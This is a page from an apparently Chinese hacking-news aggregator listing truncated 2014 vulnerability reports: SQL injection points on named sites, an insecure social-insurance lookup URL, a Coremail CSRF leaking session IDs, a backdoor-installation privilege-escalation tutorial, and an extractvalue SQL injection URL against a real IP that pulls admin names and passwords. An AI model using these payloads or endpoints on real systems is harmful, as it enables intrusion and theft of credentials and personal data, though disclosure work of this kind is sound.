记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

phpshe 1.2前台无需登录getshell

Autor:xfkxfx Website:http://www.wooyun.org/bugs/wooyun-2014-065479 ……………………….上面内容体现了博主的节操………………………………………………………. 存在漏洞的文件install/index.php,整个过程没有判断install.lock,导致可以重复安装,同是在安装的过程中,对配置
发布时间:2014-07-30 19:05 | 阅读:189 | 评论:0 | 标签:Web应用漏洞 phpshe 1.2漏洞 phpshe getshell phpshe 漏洞 phpshe任意代码写入

唯品会某站点存在SQL注入

没啥好说的,直接给出注入点:http://feedback.vip.com/feedback!detailFeedback.do?ua_id=124435&childKind=11ua_id参数存在注入,如下图:数据库:连接用户: 漏洞证明:数据库: 修复方案:过滤过滤~~~~
发布时间:2014-07-30 18:55 | 阅读:156 | 评论:0 | 标签:注入

深圳社保局少儿医保存在漏洞,登陆后可查询其他参保人的大量关键信息。

其实这个问题在2009年的时候,我就发现了。当初我家宝宝出生参加少儿医保,我登陆网站查询我家宝宝信息。由于专业的关系,看到网址,就试着修改了网址中关键的社保电脑号,果然可以查询其他少儿承保人的信息,当初以为会很快改,可是这么多年过去,还是一样.......更改网址中的GRCODE:https://seyb.szsi.gov.cn/szwcngr/prg1/slgrcbnew-fw-sq-view.jsp?EventID=CBR_GRCBQUEERY_Action&GRCODE=5005*****&DZSH=2&csrftoken=3e8bfba2935484f4109a597500f0cf1c得到其他人的参保信息:另外这个信息是可以被下载软件批量下载的............. 漏洞证明
发布时间:2014-07-30 18:55 | 阅读:197 | 评论:0 | 标签:漏洞

中国联通某站SQL注射(POST参数中的SQL语句引狼入室)

http://www.chinaunicombidding.cn/中国联通采购与招标网(从"采购公告"中可以看出是全国性的平台而且近期还在更新)点击"公共信息"-"下载中心", 输入"公文模板标题"后点击查询抓取到如下HTTP请求:POST /InfoFileTempletAction.do?cmd=simpleQueryForWeb HTTP/1.1Host: www.chinaunicombidding.cnProxy-Connection: keep-aliveContent-Length: 190Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,a
发布时间:2014-07-30 18:55 | 阅读:166 | 评论:0 | 标签:无

世纪互联ZabbixSQL注入导致命令执行(第二发)

看Logo这个web监控侧漏了吧~~来张机房拓扑图吧命令执行! 漏洞证明:看Logo这个web监控侧漏了吧~~来张机房拓扑图吧命令执行! 修复方案:1.升级2.开防火墙
发布时间:2014-07-30 18:55 | 阅读:137 | 评论:0 | 标签:注入

WEB应用漏洞: - Dlink DWR-113 Rev. Ax - CSRF Denial of Service

Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of ServiceGoogle dork : N/AExploit Author: Blessen ThomasDate : 29/07/14Vendor Homepage : http://www.dlink.com/Software Link : N/AFirmware version: v2.02 2013-03-13Tested on : Windows 7CVE : CVE-2014-3136Type of Application : Web applicationRelease mode : Coordinated disclosureVulnerability descrip
发布时间:2014-07-30 18:30 | 阅读:225 | 评论:0 | 标签:webapps CSRF

平安付招聘应用安全工程师

‍‍‍‍‍‍‍‍平安付智能技术有限公司系中国平安集团旗下专业从事第三方支付研究、开发与管理的公司。旗下包括平安付科技服务有限公司及平安付电子支付有限公司两家持有。职位描述:1、应用系统安全测试2、定期的安全风险评估和检测3、跟踪和分析新的安全漏洞、安全技术4、应急响应、应用安全事件分析职位要求:1、熟悉WEB安全,熟悉常见Web漏洞原理、防御机制2、具有一定的编程能力3、熟悉linux/windows系统4、团队协作能力、沟通能力、学习能力,主动性强、有责任心优先条件:1、有Java代码审计、编程经验,熟悉各种开源框架2、有支付行业经验3、有移动应用安全测试、调试分析能力4、有静态分析平台建设经验5、对安全有浓厚的兴趣、有明确的个人发展目标工作地点:上海请发送简历到lubinliang408#p
发布时间:2014-07-30 18:00 | 阅读:181 | 评论:0 | 标签:招聘 平安付

绿盟科技威胁分析报告 ——DDoS兵器谱2014Q2版

作者:曹志华一. 摘要网络攻防是发生在第五空间的对抗和战争。这是一个动态的过程,无论攻击者还是防御者都在实战中寻求进步。攻防双方的“兵器”就在这个战场中不断磨砺和进化。绿盟科技关注攻防的最新进展,为了帮助客户更好的对抗网络威胁,每个季度会推出最新的“DDoS兵器谱” ,介绍DDoS工具的最新发展和变化。本期兵器谱将带来以下三款DDoS工具: GoldenEye、DAVOSET以及Tor’s Hammer。 为了让读者对每个工具有更直观的了解,我们从五个维度对DDoS工具进行了评分,得分从低到高用一星到三星表示。五个维度的含义如下:1、破坏性:对服务造成伤害的能力;2、协同性:分布式协同的能力;3、隐蔽性:通过伪造地址使得攻击者难以被追踪的能力,以及攻击本身难以被检测和缓解的特性;4、扩展性:是否
发布时间:2014-07-30 18:00 | 阅读:203 | 评论:0 | 标签:网络安全 ddos nsfocus

KCon 2014(知道安全论坛)议题公布

「KCon V3 知道安全论坛第三期」力求在国内打造出一个干货高质量有趣又好玩的线下交流论坛。背景‍‍‍‍‍‍近期路由器、监控器、OpenSSL 等全球性漏洞都在持续爆发。Shodan、ZoomEye 等搜索引擎的出现让网络空间的真实面貌越发可见。‍‍网络空间‍‍,除了我们常见的互联网外,还包括物联、工控等网络。随着 ZMap 等网络空间大规模探测技术的流行,全球越来越多的个人与黑客组织参与进了网络空间的资源掠夺战中。在大规模探测技术的辅助下,哪怕概率只有万分之一,也能在庞大的网络空间中发现令人心跳的目标。‍‍议题去年跨过的客户端Evi1m0知道创宇安全研究员邪红色信息安全组织创始人,HackerSoul.com 发起人。随着XSS防御体系的日益完善,传统的跨站漏洞挖掘思路已不再如此奏效,猥琐的
发布时间:2014-07-30 18:00 | 阅读:249 | 评论:0 | 标签:活动

08提权 系统文件权限和远程连接IP绕过 安装后门

大家都知道08权限的系统权限设置很严格  面对限制IP连接的情况 我们及时拿到system权限 有账号也上不去 这种情况下只能弄shift后门 或者放大镜了  但08权限 在system权限也操作不了系统文件夹 普通权限  我用的到时MS12042  这个大家都会用单独讲sysret.exe 拿出了 我们找到w3wp.exe这个PID 然后 我就就获得想要的权限了 提权后 system权限 不能操作系统文件夹 我自己搭建的环境 先用administrator账号 测试 还是不能操作 我用到了2个命令 配合使用能赋予权限能执行 takeown /f c:windowssystem32*.*   /a /r /d y 将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administra
发布时间:2014-07-30 12:50 | 阅读:328 | 评论:0 | 标签:渗透实例 权限提升 渗透测试 后门 提权

Coremail一个CSRF 攻击可窃取用户邮件

Coremail 把邮件正文的 <img src='csrf.jpg'/> 替换成嗯,这里是相对地址,正巧 Coremail 没有过滤 <base> tag。以 http://mail.***.edu.cn 为例,用户浏览器会解析此地址为http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpghack.com 后端即可获取 sid(仍然无法获得 cookie)。Coremail 后端 jsp 获取表单请求没有判断 POST/GET,通过 302 redir
发布时间:2014-07-30 11:45 | 阅读:285 | 评论:0 | 标签:CSRF

格林豪泰短信验证漏洞和订单查询无权限控制

格林豪泰的手机网站http://m.998.com/1. 短信验证漏洞注册页面http://m.998.com/Api/Account/SendMobileCheckMsg.ashx发送验证码的请求返回结果中直接包含了短信验证码。这样的结果就是可以随便使用别人的手机号码来注册账号。同样,在非会员订单查询的登录页http://m.998.com/phone_order.html,验证码同样是这样的神逻辑。这样做是为了让前端做短信验证码的验证。前端的验证还是很容易干掉的,短信验证码完全没用了。2. 订单查询无权限控制。非会员订单查询页面的登录一点用都没有啊,因为查询的接口根本没做权限控制。http://m.998.com/Api/User/GetOrderList.ashx?cardNo=0&phone=1
发布时间:2014-07-30 11:45 | 阅读:347 | 评论:0 | 标签:漏洞

锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户

1.案例[官方]http://www.reeyee.comhttp://www.reeyee.cnhttp://www.reeyee.net[客户]http://www.cheryacteco.comhttp://www.cheryplus.comhttp://www.picc-js.comhttp://www.bqls.nethttp://www.tx-hoto.com其它客户可搜索“Powered by reeyee”或于http://www.reeyee.cn/case/中查看。2.文件遍历访问/admin/inc/dialogbox.php?pDir=&curr_dir=&type=0&filetypes=&form=frmList&formname=brief_
发布时间:2014-07-30 11:45 | 阅读:209 | 评论:0 | 标签:漏洞

搜狗快照存在持久型xss漏洞

如:http://www.sogou.com//websnapshot?ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=fd2b0d13138196abc9b801bca9d59b27&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&w=01020400&m=0&st=0&uid=1250&
发布时间:2014-07-30 11:45 | 阅读:376 | 评论:0 | 标签:xss 漏洞

银行ATM机真的安全吗?

注:本文提到的安全测试方法禁止非法利用,任何非法用途带来的后果责任自负。0×01 引子好吧,想在银行边进行渗透测试,边拍照的,但是人太多……我也就在我这成功了2次。声明,我只是友情测试,未作任何破坏。另外,我把自己的针对银行做的渗透测试思路拿出来,旨在给银行的安全建设提供一点建议(0×07节会有总结)。小弟不才,有什么不对的,还望指正出来。0×02 先谈谈银行的ATM机吧中国的ATM机很安全,反正我是没什么办法搞定了,如果你在国外可以试试我这几种方法。有些ATM机上有一个钥匙孔,不知道大家发现了没有。当然了,你也不能指望所有的ATM都有钥匙孔,有的ATM机上有,有的没有。这时,你需要一根小银条,把锁撬开(需要深厚的功底)。打开后,你将会看到ATM机
发布时间:2014-07-30 03:05 | 阅读:668 | 评论:0 | 标签:无

用免费 WiFi 会不会使手机中的各种钱包不安全?

 只要你不去 root/越狱 你的手机,随便用WIFI都是基本安全的。否则,你怎么用都是不安全的。----支付宝钱包等在传递敏感信息时是会使用SSL加密的。如果你不信任免费WIFI中继你的信息,那么你也不能在家用电脑上支付宝。事实上你传输的信息对途中每个跃点都是可见的,即便这些节点都是完全可信的,你也可能在PPPoE拨号上网时被人劫持流量,从而看到你发送的信息。SSL的安全性就体现在当信息对中间传话的人完全可见的时候,密文信息仍然不能被读取或篡改,虽然这东西也出过岔子,但总的来说仍然是很值得信任的。----让我来用浅显的方式解释一下这个过程为什么安全,为了能让没有密码学基础的盆友们理解这个过程,我做了一些不恰当的比喻,请懂的人轻拍:服务器如何确保用户安全的向自己传递信息?形象的说,就是寄给用户一个用户
发布时间:2014-07-30 03:05 | 阅读:480 | 评论:0 | 标签:无

国内三大安全众测平台体验报告

 【TSRC编者按】随着众包(Crowd-sourcing)模式的兴起和发展,安全测试也进入了这一领域。对于中小企业来说,使用众包模式进行安全测试,相对自行组建安全团队或者购买安全服务更能节约成本,提高效率。目前国内有三大安全众测平台:乌云众测、漏洞盒子、Sobug白帽众测。为了对国内的安全众测平台进行体验和支持,腾讯安全应急响应中心(TSRC)特别与三大平台进行了合作,完成了本报告,供对该领域感兴趣的读者参考。  一)概述        所谓安全众测,就是众包(Crowd-sourcing)模式在安全测试领域的一种表现。也就是企业把自己的产品给到安全众测平台,由平台的安全人员(这些安全人员也不隶属平台,而是来自
发布时间:2014-07-29 23:50 | 阅读:350 | 评论:0 | 标签:无

网康 NS-ASG 应用安全网关注入漏洞6-10

https://202.113.20.208/admin/singlelogin.php?submit=1&loginId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))https://202.113.20.208/nac/naccheck.php?username=test%2527 %20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)
发布时间:2014-07-29 21:20 | 阅读:399 | 评论:0 | 标签:注入 漏洞

公告

❤ 手机版地址:wap.hackdig.com
❤ 如果您觉得本站不错,请推荐给您的朋友!

工具

广而告知

标签云